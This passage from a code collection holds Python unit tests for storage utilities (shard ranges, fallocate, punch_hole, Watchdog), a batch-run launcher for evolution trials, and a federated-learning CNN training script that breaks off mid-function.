99000, meta_timestamp=next(self.ts_iter), state=utils.ShardRange.CREATED, state_timestamp=next(self.ts_iter)) new = sr.copy() self.assertEqual(dict(sr), dict(new)) new = sr.copy(deleted=1) self.assertEqual(dict(sr, deleted=1), dict(new)) new_timestamp = next(self.ts_iter) new = sr.copy(timestamp=new_timestamp) self.assertEqual(dict(sr, timestamp=new_timestamp.internal, meta_timestamp=new_timestamp.internal, state_timestamp=new_timestamp.internal), dict(new)) new = sr.copy(timestamp=new_timestamp, object_count=99) self.assertEqual(dict(sr, timestamp=new_timestamp.internal, meta_timestamp=new_timestamp.internal, state_timestamp=new_timestamp.internal, object_count=99), dict(new)) def test_make_path(self): ts = utils.Timestamp.now() actual = utils.ShardRange.make_path('a', 'root', 'parent', ts, 0) parent_hash = hashlib.md5(b'parent').hexdigest() self.assertEqual('a/root-%s-%s-0' % (parent_hash, ts.internal), actual) actual = utils.ShardRange.make_path('a', 'root', 'parent', ts, 3) self.assertEqual('a/root-%s-%s-3' % (parent_hash, ts.internal), actual) actual = utils.ShardRange.make_path('a', 'root', 'parent', ts, '3') self.assertEqual('a/root-%s-%s-3' % (parent_hash, ts.internal), actual) actual = utils.ShardRange.make_path( 'a', 'root', 'parent', ts.internal, '3') self.assertEqual('a/root-%s-%s-3' % (parent_hash, ts.internal), actual) actual = utils.ShardRange.make_path('a', 'root', 'parent', ts, 'foo') self.assertEqual('a/root-%s-%s-foo' % (parent_hash, ts.internal), actual) @patch('ctypes.get_errno') @patch.object(utils, '_sys_posix_fallocate') @patch.object(utils, '_sys_fallocate') @patch.object(utils, 'FALLOCATE_RESERVE', 0) class TestFallocate(unittest.TestCase): def test_fallocate(self, sys_fallocate_mock, sys_posix_fallocate_mock, get_errno_mock): sys_fallocate_mock.available = True sys_fallocate_mock.return_value = 0 utils.fallocate(1234, 5000 * 2 ** 20) # We can't use sys_fallocate_mock.assert_called_once_with because no # two ctypes.c_uint64 objects are equal even if their values are # equal. Yes, ctypes.c_uint64(123) != ctypes.c_uint64(123). calls = sys_fallocate_mock.mock_calls self.assertEqual(len(calls), 1) args = calls[0][1] self.assertEqual(len(args), 4) self.assertEqual(args[0], 1234) self.assertEqual(args[1], utils.FALLOC_FL_KEEP_SIZE) self.assertEqual(args[2].value, 0) self.assertEqual(args[3].value, 5000 * 2 ** 20) sys_posix_fallocate_mock.assert_not_called() def test_fallocate_offset(self, sys_fallocate_mock, sys_posix_fallocate_mock, get_errno_mock): sys_fallocate_mock.available = True sys_fallocate_mock.return_value = 0 utils.fallocate(1234, 5000 * 2 ** 20, offset=3 * 2 ** 30) calls = sys_fallocate_mock.mock_calls self.assertEqual(len(calls), 1) args = calls[0][1] self.assertEqual(len(args), 4) self.assertEqual(args[0], 1234) self.assertEqual(args[1], utils.FALLOC_FL_KEEP_SIZE) self.assertEqual(args[2].value, 3 * 2 ** 30) self.assertEqual(args[3].value, 5000 * 2 ** 20) sys_posix_fallocate_mock.assert_not_called() def test_fallocate_fatal_error(self, sys_fallocate_mock, sys_posix_fallocate_mock, get_errno_mock): sys_fallocate_mock.available = True sys_fallocate_mock.return_value = -1 get_errno_mock.return_value = errno.EIO with self.assertRaises(OSError) as cm: utils.fallocate(1234, 5000 * 2 ** 20) self.assertEqual(cm.exception.errno, errno.EIO) def test_fallocate_silent_errors(self, sys_fallocate_mock, sys_posix_fallocate_mock, get_errno_mock): sys_fallocate_mock.available = True sys_fallocate_mock.return_value = -1 for silent_error in (0, errno.ENOSYS, errno.EOPNOTSUPP, errno.EINVAL): get_errno_mock.return_value = silent_error try: utils.fallocate(1234, 5678) except OSError: self.fail("fallocate() raised an error on %d", silent_error) def test_posix_fallocate_fallback(self, sys_fallocate_mock, sys_posix_fallocate_mock, get_errno_mock): sys_fallocate_mock.available = False sys_fallocate_mock.side_effect = NotImplementedError sys_posix_fallocate_mock.available = True sys_posix_fallocate_mock.return_value = 0 utils.fallocate(1234, 567890) sys_fallocate_mock.assert_not_called() calls = sys_posix_fallocate_mock.mock_calls self.assertEqual(len(calls), 1) args = calls[0][1] self.assertEqual(len(args), 3) self.assertEqual(args[0], 1234) self.assertEqual(args[1].value, 0) self.assertEqual(args[2].value, 567890) def test_posix_fallocate_offset(self, sys_fallocate_mock, sys_posix_fallocate_mock, get_errno_mock): sys_fallocate_mock.available = False sys_fallocate_mock.side_effect = NotImplementedError sys_posix_fallocate_mock.available = True sys_posix_fallocate_mock.return_value = 0 utils.fallocate(1234, 5000 * 2 ** 20, offset=3 * 2 ** 30) calls = sys_posix_fallocate_mock.mock_calls self.assertEqual(len(calls), 1) args = calls[0][1] self.assertEqual(len(args), 3) self.assertEqual(args[0], 1234) self.assertEqual(args[1].value, 3 * 2 ** 30) self.assertEqual(args[2].value, 5000 * 2 ** 20) sys_fallocate_mock.assert_not_called() def test_no_fallocates_available(self, sys_fallocate_mock, sys_posix_fallocate_mock, get_errno_mock): sys_fallocate_mock.available = False sys_posix_fallocate_mock.available = False with mock.patch("logging.warning") as warning_mock, \ mock.patch.object(utils, "_fallocate_warned_about_missing", False): utils.fallocate(321, 654) utils.fallocate(321, 654) sys_fallocate_mock.assert_not_called() sys_posix_fallocate_mock.assert_not_called() get_errno_mock.assert_not_called() self.assertEqual(len(warning_mock.mock_calls), 1) def test_arg_bounds(self, sys_fallocate_mock, sys_posix_fallocate_mock, get_errno_mock): sys_fallocate_mock.available = True sys_fallocate_mock.return_value = 0 with self.assertRaises(ValueError): utils.fallocate(0, 1 << 64, 0) with self.assertRaises(ValueError): utils.fallocate(0, 0, -1) with self.assertRaises(ValueError): utils.fallocate(0, 0, 1 << 64) self.assertEqual([], sys_fallocate_mock.mock_calls) # sanity check utils.fallocate(0, 0, 0) self.assertEqual( [mock.call(0, utils.FALLOC_FL_KEEP_SIZE, mock.ANY, mock.ANY)], sys_fallocate_mock.mock_calls) # Go confirm the ctypes values separately; apparently == doesn't # work the way you'd expect with ctypes :-/ self.assertEqual(sys_fallocate_mock.mock_calls[0][1][2].value, 0) self.assertEqual(sys_fallocate_mock.mock_calls[0][1][3].value, 0) sys_fallocate_mock.reset_mock() # negative size will be adjusted as 0 utils.fallocate(0, -1, 0) self.assertEqual( [mock.call(0, utils.FALLOC_FL_KEEP_SIZE, mock.ANY, mock.ANY)], sys_fallocate_mock.mock_calls) self.assertEqual(sys_fallocate_mock.mock_calls[0][1][2].value, 0) self.assertEqual(sys_fallocate_mock.mock_calls[0][1][3].value, 0) @patch.object(os, 'fstatvfs') @patch.object(utils, '_sys_fallocate', available=True, return_value=0) @patch.object(utils, 'FALLOCATE_RESERVE', 0) @patch.object(utils, 'FALLOCATE_IS_PERCENT', False) @patch.object(utils, '_fallocate_enabled', True) class TestFallocateReserve(unittest.TestCase): def _statvfs_result(self, f_frsize, f_bavail): # Only 3 values are relevant to us, so use zeros for the rest f_blocks = 100 return posix.statvfs_result((0, f_frsize, f_blocks, 0, f_bavail, 0, 0, 0, 0, 0)) def test_disabled(self, sys_fallocate_mock, fstatvfs_mock): utils.disable_fallocate() utils.fallocate(123, 456) sys_fallocate_mock.assert_not_called() fstatvfs_mock.assert_not_called() def test_zero_reserve(self, sys_fallocate_mock, fstatvfs_mock): utils.fallocate(123, 456) fstatvfs_mock.assert_not_called() self.assertEqual(len(sys_fallocate_mock.mock_calls), 1) def test_enough_space(self, sys_fallocate_mock, fstatvfs_mock): # Want 1024 bytes in reserve plus 1023 allocated, and have 2 blocks # of size 1024 free, so succeed utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \ utils.config_fallocate_value('1024') fstatvfs_mock.return_value = self._statvfs_result(1024, 2) utils.fallocate(88, 1023) def test_not_enough_space(self, sys_fallocate_mock, fstatvfs_mock): # Want 1024 bytes in reserve plus 1024 allocated, and have 2 blocks # of size 1024 free, so fail utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \ utils.config_fallocate_value('1024') fstatvfs_mock.return_value = self._statvfs_result(1024, 2) with self.assertRaises(OSError) as catcher: utils.fallocate(88, 1024) self.assertEqual( str(catcher.exception), '[Errno %d] FALLOCATE_RESERVE fail 1024 <= 1024' % errno.ENOSPC) sys_fallocate_mock.assert_not_called() def test_not_enough_space_large(self, sys_fallocate_mock, fstatvfs_mock): # Want 1024 bytes in reserve plus 1GB allocated, and have 2 blocks # of size 1024 free, so fail utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \ utils.config_fallocate_value('1024') fstatvfs_mock.return_value = self._statvfs_result(1024, 2) with self.assertRaises(OSError) as catcher: utils.fallocate(88, 1 << 30) self.assertEqual( str(catcher.exception), '[Errno %d] FALLOCATE_RESERVE fail %g <= 1024' % (errno.ENOSPC, ((2 * 1024) - (1 << 30)))) sys_fallocate_mock.assert_not_called() def test_enough_space_small_blocks(self, sys_fallocate_mock, fstatvfs_mock): # Want 1024 bytes in reserve plus 1023 allocated, and have 4 blocks # of size 512 free, so succeed utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \ utils.config_fallocate_value('1024') fstatvfs_mock.return_value = self._statvfs_result(512, 4) utils.fallocate(88, 1023) def test_not_enough_space_small_blocks(self, sys_fallocate_mock, fstatvfs_mock): # Want 1024 bytes in reserve plus 1024 allocated, and have 4 blocks # of size 512 free, so fail utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \ utils.config_fallocate_value('1024') fstatvfs_mock.return_value = self._statvfs_result(512, 4) with self.assertRaises(OSError) as catcher: utils.fallocate(88, 1024) self.assertEqual( str(catcher.exception), '[Errno %d] FALLOCATE_RESERVE fail 1024 <= 1024' % errno.ENOSPC) sys_fallocate_mock.assert_not_called() def test_free_space_under_reserve(self, sys_fallocate_mock, fstatvfs_mock): # Want 2048 bytes in reserve but have only 3 blocks of size 512, so # allocating even 0 bytes fails utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \ utils.config_fallocate_value('2048') fstatvfs_mock.return_value = self._statvfs_result(512, 3) with self.assertRaises(OSError) as catcher: utils.fallocate(88, 0) self.assertEqual( str(catcher.exception), '[Errno %d] FALLOCATE_RESERVE fail 1536 <= 2048' % errno.ENOSPC) sys_fallocate_mock.assert_not_called() def test_all_reserved(self, sys_fallocate_mock, fstatvfs_mock): # Filesystem is empty, but our reserve is bigger than the # filesystem, so any allocation will fail utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \ utils.config_fallocate_value('9999999999999') fstatvfs_mock.return_value = self._statvfs_result(1024, 100) self.assertRaises(OSError, utils.fallocate, 88, 0) sys_fallocate_mock.assert_not_called() def test_enough_space_pct(self, sys_fallocate_mock, fstatvfs_mock): # Want 1% reserved, filesystem has 3/100 blocks of size 1024 free # and file size is 2047, so succeed utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \ utils.config_fallocate_value('1%') fstatvfs_mock.return_value = self._statvfs_result(1024, 3) utils.fallocate(88, 2047) def test_not_enough_space_pct(self, sys_fallocate_mock, fstatvfs_mock): # Want 1% reserved, filesystem has 3/100 blocks of size 1024 free # and file size is 2048, so fail utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \ utils.config_fallocate_value('1%') fstatvfs_mock.return_value = self._statvfs_result(1024, 3) with self.assertRaises(OSError) as catcher: utils.fallocate(88, 2048) self.assertEqual( str(catcher.exception), '[Errno %d] FALLOCATE_RESERVE fail 1 <= 1' % errno.ENOSPC) sys_fallocate_mock.assert_not_called() def test_all_space_reserved_pct(self, sys_fallocate_mock, fstatvfs_mock): # Filesystem is empty, but our reserve is the whole filesystem, so # any allocation will fail utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \ utils.config_fallocate_value('100%') fstatvfs_mock.return_value = self._statvfs_result(1024, 100) with self.assertRaises(OSError) as catcher: utils.fallocate(88, 0) self.assertEqual( str(catcher.exception), '[Errno %d] FALLOCATE_RESERVE fail 100 <= 100' % errno.ENOSPC) sys_fallocate_mock.assert_not_called() @patch('ctypes.get_errno') @patch.object(utils, '_sys_fallocate') class TestPunchHole(unittest.TestCase): def test_punch_hole(self, sys_fallocate_mock, get_errno_mock): sys_fallocate_mock.available = True sys_fallocate_mock.return_value = 0 utils.punch_hole(123, 456, 789) calls = sys_fallocate_mock.mock_calls self.assertEqual(len(calls), 1) args = calls[0][1] self.assertEqual(len(args), 4) self.assertEqual(args[0], 123) self.assertEqual( args[1], utils.FALLOC_FL_PUNCH_HOLE | utils.FALLOC_FL_KEEP_SIZE) self.assertEqual(args[2].value, 456) self.assertEqual(args[3].value, 789) def test_error(self, sys_fallocate_mock, get_errno_mock): sys_fallocate_mock.available = True sys_fallocate_mock.return_value = -1 get_errno_mock.return_value = errno.EISDIR with self.assertRaises(OSError) as cm: utils.punch_hole(123, 456, 789) self.assertEqual(cm.exception.errno, errno.EISDIR) def test_arg_bounds(self, sys_fallocate_mock, get_errno_mock): sys_fallocate_mock.available = True sys_fallocate_mock.return_value = 0 with self.assertRaises(ValueError): utils.punch_hole(0, 1, -1) with self.assertRaises(ValueError): utils.punch_hole(0, 1 << 64, 1) with self.assertRaises(ValueError): utils.punch_hole(0, -1, 1) with self.assertRaises(ValueError): utils.punch_hole(0, 1, 0) with self.assertRaises(ValueError): utils.punch_hole(0, 1, 1 << 64) self.assertEqual([], sys_fallocate_mock.mock_calls) # sanity check utils.punch_hole(0, 0, 1) self.assertEqual( [mock.call( 0, utils.FALLOC_FL_PUNCH_HOLE | utils.FALLOC_FL_KEEP_SIZE, mock.ANY, mock.ANY)], sys_fallocate_mock.mock_calls) # Go confirm the ctypes values separately; apparently == doesn't # work the way you'd expect with ctypes :-/ self.assertEqual(sys_fallocate_mock.mock_calls[0][1][2].value, 0) self.assertEqual(sys_fallocate_mock.mock_calls[0][1][3].value, 1) def test_no_fallocate(self, sys_fallocate_mock, get_errno_mock): sys_fallocate_mock.available = False with self.assertRaises(OSError) as cm: utils.punch_hole(123, 456, 789) self.assertEqual(cm.exception.errno, errno.ENOTSUP) class TestPunchHoleReally(unittest.TestCase): def setUp(self): if not utils._sys_fallocate.available: raise unittest.SkipTest("utils._sys_fallocate not available") def test_punch_a_hole(self): with TemporaryFile() as tf: tf.write(b"x" * 64 + b"y" * 64 + b"z" * 64) tf.flush() # knock out the first half of the "y"s utils.punch_hole(tf.fileno(), 64, 32) tf.seek(0) contents = tf.read(4096) self.assertEqual( contents, b"x" * 64 + b"\0" * 32 + b"y" * 32 + b"z" * 64) class Test_LibcWrapper(unittest.TestCase): def test_available_function(self): # This should pretty much always exist getpid_wrapper = utils._LibcWrapper('getpid') self.assertTrue(getpid_wrapper.available) self.assertEqual(getpid_wrapper(), os.getpid()) def test_unavailable_function(self): # This won't exist no_func_wrapper = utils._LibcWrapper('diffractively_protectorship') self.assertFalse(no_func_wrapper.available) self.assertRaises(NotImplementedError, no_func_wrapper) def test_argument_plumbing(self): lseek_wrapper = utils._LibcWrapper('lseek') with TemporaryFile() as tf: tf.write(b"abcdefgh") tf.flush() lseek_wrapper(tf.fileno(), ctypes.c_uint64(3), # 0 is SEEK_SET 0) self.assertEqual(tf.read(100), b"defgh") class TestWatchdog(unittest.TestCase): def test_start_stop(self): w = utils.Watchdog() w._evt.send = mock.Mock(side_effect=w._evt.send) gth = object() with patch('eventlet.greenthread.getcurrent', return_value=gth),\ patch('time.time', return_value=10.0): # On first call, _next_expiration is None, it should unblock # greenthread that is blocked for ever key = w.start(1.0, Timeout) self.assertIn(key, w._timeouts) self.assertEqual(w._timeouts[key], (1.0, 11.0, gth, Timeout)) w._evt.send.assert_called_once() w.stop(key) self.assertNotIn(key, w._timeouts) def test_timeout_concurrency(self): w = utils.Watchdog() w._evt.send = mock.Mock(side_effect=w._evt.send) w._evt.wait = mock.Mock() gth = object() w._run() w._evt.wait.assert_called_once_with(None) with patch('eventlet.greenthread.getcurrent', return_value=gth): w._evt.send.reset_mock() w._evt.wait.reset_mock() with patch('time.time', return_value=10.00): # On first call, _next_expiration is None, it should unblock # greenthread that is blocked for ever w.start(5.0, Timeout) # Will end at 15.0 w._evt.send.assert_called_once() with patch('time.time', return_value=10.01): w._run() self.assertEqual(15.0, w._next_expiration) w._evt.wait.assert_called_once_with(15.0 - 10.01) w._evt.send.reset_mock() w._evt.wait.reset_mock() with patch('time.time', return_value=12.00): # Now _next_expiration is 15.0, it won't unblock greenthread # because this expiration is later w.start(5.0, Timeout) # Will end at 17.0 w._evt.send.assert_not_called() w._evt.send.reset_mock() w._evt.wait.reset_mock() with patch('time.time', return_value=14.00): # Now _next_expiration is still 15.0, it will unblock # greenthread because this new expiration is 14.5 w.start(0.5, Timeout) # Will end at 14.5 w._evt.send.assert_called_once() with patch('time.time', return_value=14.01): w._run() w._evt.wait.assert_called_once_with(14.5 - 14.01) self.assertEqual(14.5, w._next_expiration) # Should wakeup at 14.5 def test_timeout_expire(self): w = utils.Watchdog() w._evt.send = mock.Mock() # To avoid it to call get_hub() w._evt.wait = mock.Mock() # To avoid it to call get_hub() with patch('eventlet.hubs.get_hub') as m_gh: with patch('time.time', return_value=10.0): w.start(5.0, Timeout) # Will end at 15.0 with patch('time.time', return_value=16.0): w._run() m_gh.assert_called_once() m_gh.return_value.schedule_call_global.assert_called_once() exc = m_gh.return_value.schedule_call_global.call_args[0][2] self.assertIsInstance(exc, Timeout) self.assertEqual(exc.seconds, 5.0) self.assertEqual(None, w._next_expiration) w._evt.wait.assert_called_once_with(None)
batchrun.py
import os import time from datetime import date from datetime import datetime import argparse import multiprocessing parser = argparse.ArgumentParser() parser.add_argument("--runs", default=10, type=int, help="Change the number of evolution trials") parser.add_argument("--newConfigFile", default=None, type=str, help="Use a different configuration file") parser.add_argument("--probabilities", default=None, nargs=4, type=float, help="Set random network reaction probabilities") parser.add_argument("--numGenerations", default=None, type=int, help="Set the max number of generations") parser.add_argument("--multiprocess", default="True", type=str, help="Enable or disable multiprocessing") def toBool(args): multiprocess = args.multiprocess.upper() if multiprocess.startswith("T"): return True else: return False def parseProbabilities(probabilities): probString = '' for p in probabilities: probString += str(p) + ' ' return probString def runEvolution(args): command = 'python ./evolve.py' if args.newConfigFile: command += f' --newConfigFile {args.newConfigFile}' if args.numGenerations: command += f' --numGenerations {str(args.numGenerations)}' if args.probabilities: command += f' --probabilities {parseProbabilities(args.probabilities)}' today = date.today() now = datetime.now() start = time.time() #If not multiprocessing, enable printing and loop through batches if not toBool(args): print("Batch set up for " + str(args.runs) + " runs") print("Run Started on: ", today.strftime("%b-%d-%Y")) print("at time: ", now.strftime("%H:%M:%S"), '\n') for i in range(args.runs): if not toBool(args): print("-----------------------------------------------------") print(" --- BATCH NUMBER --- " + str(i+1) + ' out of ' + str(args.runs) + ' total.') print("-----------------------------------------------------") os.system(command) print("Time taken to do batch runs = ", time.time() - start) # If multiprocessing, then we will loop through the entire function each time, so disable printing # and run the command once per function else: os.system(command) if __name__=='__main__': args = parser.parse_args() # Multiprocess: if toBool(args): starttime = time.time() processes = [] for i in range(args.runs): p = multiprocessing.Process(target=runEvolution, args=(args,)) processes.append(p) p.start() for process in processes: process.join() print(f"Finished in {time.time()-starttime} seconds.") else: runEvolution(args)
federated_thzdata_sample_CNN.py
from __future__ import absolute_import, division, print_function, unicode_literals from keras.utils import to_categorical import numpy as np import tensorflow as tf import datetime import scipy.io as sio import multiprocessing import math from matplotlib.pyplot import pause import os import glob import argparse parser = argparse.ArgumentParser() parser.add_argument('-l1', default=0.1, help=" sets the learning rate (gradient exchange) for convolutional layer", type=float) parser.add_argument('-l2', default=0.1, help="sets the learning rate (gradient exchange) for FC layer", type=float) parser.add_argument('-mu', default=0.025, help="sets the learning rate for local SGD", type=float) parser.add_argument('-eps', default=1, help="sets the mixing parameters for model averaging (CFA)", type=float) parser.add_argument('-K', default=80, help="sets the number of network devices", type=int) parser.add_argument('-N', default=2, help="sets the number of neighbors per device", type=int) parser.add_argument('-T', default=120, help="sets the number of training epochs", type=int) parser.add_argument('-ro', default=0.99, help="sets the hyperparameter for MEWMA", type=float) args = parser.parse_args() # Parameters for learning rate optimization and batch size ################## learning_rate = args.mu learning_rate1 = args.l1 # mu_t \times beta (from paper) - layer 1 learning_rate2 = args.l2 # mu_t \times beta (from paper) - layer 2 training_epochs = args.T batch_size = 5 display_step = 10 # convolutional 1D parameters filter = 16 number = 8 pooling = 5 stride = 5 multip = 21 ############################################################################# # sets neighbor indexes for k-regular networks (number of neighbors is 'neighbors' def get_connectivity(ii_saved_local, neighbors, devices): if (ii_saved_local == 0): sets_neighbors_final = np.arange(ii_saved_local + 1, ii_saved_local + neighbors + 1) elif (ii_saved_local == devices - 1): sets_neighbors_final = np.arange(ii_saved_local - neighbors, ii_saved_local) elif (ii_saved_local >= math.ceil(neighbors / 2)) and (ii_saved_local <= devices - math.ceil(neighbors / 2) - 1): sets_neighbors = np.arange(ii_saved_local - math.floor(neighbors / 2), ii_saved_local + math.floor(neighbors / 2) + 1) index_ii = np.where(sets_neighbors == ii_saved_local) sets_neighbors_final = np.delete(sets_neighbors, index_ii) else: if (ii_saved_local - math.ceil(neighbors / 2) < 0): sets_neighbors = np.arange(0, neighbors + 1) else: sets_neighbors = np.arange(devices - neighbors - 1, devices) index_ii = np.where(sets_neighbors == ii_saved_local) sets_neighbors_final = np.delete(sets_neighbors, index_ii) return sets_neighbors_final # compute weights for CFA def federated_weights_computing2(filename, filename2, ii, ii2, epoch, devices,neighbors): saved_epoch = epoch b_v = 1/devices # eps_t_control = 1 #from paper eps_t_control = args.eps while not os.path.isfile(filename2): print('Waiting..') pause(1) try: mathcontent = sio.loadmat(filename2) except: print('Detected problem while loading file') pause(3) mathcontent = sio.loadmat(filename2) weights_current_l1 = mathcontent['weights1'] biases_current_l1 = mathcontent['biases1'] weights_current_l2 = mathcontent['weights2'] biases_current_l2 = mathcontent['biases2'] while not os.path.isfile(filename): print('Waiting..') pause(1) try: mathcontent = sio.loadmat(filename) except: print('Detected problem while loading file') pause(3) mathcontent = sio.loadmat(filename) balancing_vect = np.ones(devices)*b_v weight_factor = (balancing_vect[ii2]/(balancing_vect[ii2] + (neighbors-1)*balancing_vect[ii])) # equation (11) from paper updated_weights_l1 = weights_current_l1 + eps_t_control * weight_factor*(mathcontent['weights1'] - weights_current_l1) # see paper section 3 updated_biases_l1 = biases_current_l1 + eps_t_control*weight_factor*(mathcontent['biases1'] - biases_current_l1) updated_weights_l2 = weights_current_l2 + eps_t_control * weight_factor * (mathcontent['weights2'] - weights_current_l2) # see paper section 3 updated_biases_l2 = biases_current_l2 + eps_t_control * weight_factor * (mathcontent['biases2'] - biases_current_l2) weights_l1 = updated_weights_l1 biases_l1 = updated_biases_l1 weights_l2 = updated_weights_l2 biases_l2 = updated_biases_l2 try: sio.savemat('temp_datamat{}_{}.mat'.format(ii, saved_epoch), { "weights1": weights_l1, "biases1": biases_l1, "weights2": weights_l2, "biases2": biases_l2}) mathcontent = sio.loadmat('temp_datamat{}_{}.mat'.format(ii, saved_epoch)) except: print('Unable to save file .. retrying') pause(3) print(biases) sio.savemat('temp_datamat{}_{}.mat'.format(ii, saved_epoch), { "weights1": weights_l1, "biases1": biases_l1, "weights2": weights_l2, "biases2": biases_l2}) return weights_l1, biases_l1, weights_l2, biases_l2 def conv1d(x, W, b, strides=1): # Conv1D wrapper, with bias and relu activation x = tf.expand_dims(x, 2) x = tf.nn.conv1d(x, W, stride=stride, padding='SAME') x = tf.nn.bias_add(x, b) return tf.nn.relu(x) # CFA-GE 4 stage implementation def getFederatedWeight_gradients(n_W_l1, n_W_l2, n_b_l1, n_b_l2, federated, devices, ii_saved_local, epoch, v_loss,eng, x_train2, y_train2, neighbors, W_l1_saved, W_l2_saved, n_l1_saved, n_l2_saved): x_c = tf.placeholder(tf.float32, [None, 512]) # 512 point FFT range measurements y_c = tf.placeholder(tf.float32, [None, 8]) # 0-7 HR distances => 8 classes W_ext_c_l1 = tf.placeholder(tf.float32, [filter, 1, number]) b_ext_c_l1 = tf.placeholder(tf.float32, [number]) W_ext_c_l2 = tf.placeholder(tf.float32, [multip*number, 8]) b_ext_c_l2 = tf.placeholder(tf.float32, [8]) # Construct model Layer #1 CNN 1d, Layer #2 FC hidden1 = conv1d(x_c, W_ext_c_l1, b_ext_c_l1) hidden1 = tf.layers.max_pooling1d(hidden1, pool_size=stride, strides=stride, padding='SAME') fc1 = tf.reshape(hidden1, [-1, multip * number]) pred_c = tf.nn.softmax(tf.matmul(fc1, W_ext_c_l2) + b_ext_c_l2) # example 2 layers # Minimize error using cross entropy cost_c = tf.reduce_mean(-tf.reduce_sum(y_c * tf.log(tf.clip_by_value(pred_c, 1e-15, 0.99)), reduction_indices=1)) # obtain the gradients for each layer grad_W_c_l1, grad_b_c_l1, grad_W_c_l2, grad_b_c_l2 = tf.gradients(xs=[W_ext_c_l1, b_ext_c_l1, W_ext_c_l2, b_ext_c_l2], ys=cost_c) # Initialize the variables (i.e. assign their default value) init_c = tf.global_variables_initializer() if (federated): if devices > 1: if epoch == 0: sio.savemat('datamat{}_{}.mat'.format(ii_saved_local, epoch), { "weights1": n_W_l1, "biases1": n_b_l1, "weights2": n_W_l2, "biases2": n_b_l2, "epoch": epoch, "loss_sample": v_loss}) W_up_l1 = n_W_l1 W_up_l2 = n_W_l2 n_up_l1 = n_b_l1 n_up_l2 = n_b_l2 else: sio.savemat('temp_datamat{}_{}.mat'.format(ii_saved_local, epoch), { "weights1": n_W_l1, "biases1": n_b_l1, "weights2": n_W_l2, "biases2": n_b_l2, "epoch": epoch, "loss_sample": v_loss}) neighbor_vec = get_connectivity(ii_saved_local, neighbors, devices) for neighbor_index in range(neighbor_vec.size): while not os.path.isfile( 'datamat{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch - 1)) or not os.path.isfile( 'temp_datamat{}_{}.mat'.format(ii_saved_local, epoch)): # print('Waiting for datamat{}_{}.mat'.format(ii_saved_local - 1, epoch - 1)) pause(1) [W_up_l1, n_up_l1, W_up_l2, n_up_l2] = federated_weights_computing2('datamat{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch - 1), 'temp_datamat{}_{}.mat'.format(ii_saved_local, epoch), ii_saved_local, neighbor_vec[neighbor_index], epoch, devices, neighbors) pause(5) try: sio.savemat('datamat{}_{}.mat'.format(ii_saved_local, epoch), { "weights1": W_up_l1, "biases1": n_up_l1, "weights2": W_up_l2, "biases2": n_up_l2}) mathcontent = sio.loadmat('datamat{}_{}.mat'.format(ii_saved_local, epoch)) except: print('Unable to save file .. retrying') pause(3) sio.savemat('datamat{}_{}.mat'.format(ii_saved_local, epoch), { "weights1": W_up_l1, "biases1": n_up_l1, "weights2": W_up_l2, "biases2": n_up_l2}) while not os.path.isfile('datamat{}_{}.mat'.format(ii_saved_local, epoch)): # print('Waiting for datamat{}_{}.mat'.format(ii_saved_local, epoch)) pause(1) # waiting for other updates # expanded for gradient exchange pause(3) g_W_c_vect_l1 = np.zeros([filter, 1, number, devices]) g_b_c_vect_l1 = np.zeros([number, devices]) g_W_c_vect_l2 = np.zeros([multip*number, 8, devices]) g_b_c_vect_l2 = np.zeros([8, devices]) for neighbor_index in range(neighbor_vec.size): while not os.path.isfile( 'datamat{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch)): # print('Waiting for datamat{}_{}.mat'.format(ii_saved_local - 1, epoch)) pause(1) try: mathcontent = sio.loadmat('datamat{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch)) W_up_neigh_l1 = np.asarray(mathcontent['weights1']) n_up_neigh_l1 = np.squeeze(np.asarray(mathcontent['biases1'])) W_up_neigh_l2 = np.asarray(mathcontent['weights2']) n_up_neigh_l2 = np.squeeze(np.array(mathcontent['biases2'])) except: pause(5) mathcontent = sio.loadmat('datamat{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch)) W_up_neigh_l1 = np.asarray(mathcontent['weights1']) n_up_neigh_l1 = np.squeeze(np.asarray(mathcontent['biases1'])) W_up_neigh_l2 = np.asarray(mathcontent['weights2']) n_up_neigh_l2 = np.squeeze(np.array(mathcontent['biases2'])) with tf.Session() as sess3: sess3.run(init_c) g_W_c_l1, g_b_c_l1, g_W_c_l2, g_b_c_l2 = sess3.run([grad_W_c_l1, grad_b_c_l1, grad_W_c_l2, grad_b_c_l2], feed_dict={x_c: x_train2, y_c: y_train2, W_ext_c_l1: W_up_neigh_l1, b_ext_c_l1: n_up_neigh_l1, W_ext_c_l2: W_up_neigh_l2, b_ext_c_l2: n_up_neigh_l2}) g_W_c_vect_l1[:, :, :, neighbor_vec[neighbor_index]] = g_W_c_l1 g_b_c_vect_l1[:, neighbor_vec[neighbor_index]] = g_b_c_l1 g_W_c_vect_l2[:, :, neighbor_vec[neighbor_index]] = g_W_c_l2 g_b_c_vect_l2[:, neighbor_vec[neighbor_index]] = g_b_c_l2 # save gradients and upload try: sio.savemat('datagrad{}_{}.mat'.format(ii_saved_local, epoch), { "grad_weights1": g_W_c_vect_l1, "grad_biases1": g_b_c_vect_l1, "grad_weights2": g_W_c_vect_l2, "grad_biases2": g_b_c_vect_l2, "epoch": epoch}) # waiting for other gradient updates pause(5) mathcontent = sio.loadmat('datagrad{}_{}.mat'.format(ii_saved_local, epoch)) test_var = mathcontent['grad_biases1'] del mathcontent except: print('Unable to save file .. retrying') pause(3) sio.savemat('datagrad{}_{}.mat'.format(ii_saved_local, epoch), { "grad_weights1": g_W_c_vect_l1, "grad_biases1": g_b_c_vect_l1, "grad_weights2": g_W_c_vect_l2, "grad_biases2": g_b_c_vect_l2, "epoch": epoch}) # waiting for other gradient updates pause(5) try: mathcontent = sio.loadmat('datamat{}_{}.mat'.format(ii_saved_local, epoch)) W_up_l1 = np.asarray(mathcontent['weights1']) n_up_l1 = 